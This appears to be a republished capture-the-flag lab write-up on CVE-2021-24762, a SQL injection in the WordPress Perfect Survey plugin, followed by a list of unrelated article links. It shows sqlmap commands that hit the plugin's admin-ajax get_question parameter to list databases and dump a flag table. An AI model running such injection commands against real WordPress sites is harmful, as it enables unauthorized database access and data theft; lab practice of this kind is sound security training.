当前位置: 首页 > news >正文

春秋云镜 CVE-2021-24762

news 2025/7/6 12:07:43

春秋云镜 CVE-2021-24762 WordPress Plugin Perfect Survey 注入

靶标介绍

WordPress Perfect Survey plugin在1.5.2之前版本存在SQL注入漏洞,该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。

启动场景

在这里插入图片描述

漏洞利用

python3 sqlmap.py  -u "http://eci-2zehkhkwl7periauw3h5.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 *" --dbms=mysql --dbs

在这里插入图片描述
盲猜flag存在于cms库中

python3 sqlmap.py  -u "http://eci-2zehkhkwl7periauw3h5.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 *" --dbms=mysql -D cms -T flag --dump

在这里插入图片描述

得到flag

flag{44cdf008-2751-49ca-88a5-e9daed857223}

http://www.lryc.cn/news/106600.html

相关文章:

  • K8s中的Service
  • [软件工程] 全局分析规格说明书模板
  • 【JAVASE】封装
  • Java多线程(四)
  • Linux 文件系统预留空间
  • 篇一:单例模式:C++中的独一无二
  • JVM之内存结构
  • C#实现结构体与字节流的相互转化
  • 用LangChain开源框架实现知识机器人
  • HCIP——前期综合实验
  • 【2023年电赛】运动目标控制与自动追踪系统(E 题)最简单实现
  • 【IMX6ULL驱动开发学习】22.IMX6ULL开发板读取ADC(以MQ-135为例)
  • 宝塔安装ModStart,快速开启高效开发之旅!
  • 第六章 HL7 架构和可用工具 - 定义新的消息类型和结构类型
  • 通向架构师的道路之Tomcat性能调优
  • vue03 es6中对数组的操作,vue对数据监控的原理(分别对对象和数组的监控)
  • 微信小程序 - 解析富文本插件版们
  • 工厂方法模式(Factory Method)
  • js如何将图片转成BASE64编码,网页跟uniapp开发的app的区别?
  • 1400*C. Computer Game
  • windows10访问Ubuntu 18.04共享目录(已验证)
  • Linux安装redis执行make命令报错:gcc not found和*** [adlist.o] Error 1
  • R语言glmnet包详解:横截面数据建模
  • LeetCode257. 二叉树的所有路径
  • ajax、axios、fetch的区别
  • Liunx开发工具
  • Docker入门之运行Nginx案例
  • 【深度学习环境】安装anaconda、tensorflow、pycharm
  • mockery 模拟
  • 汽车后视镜反射率检测系统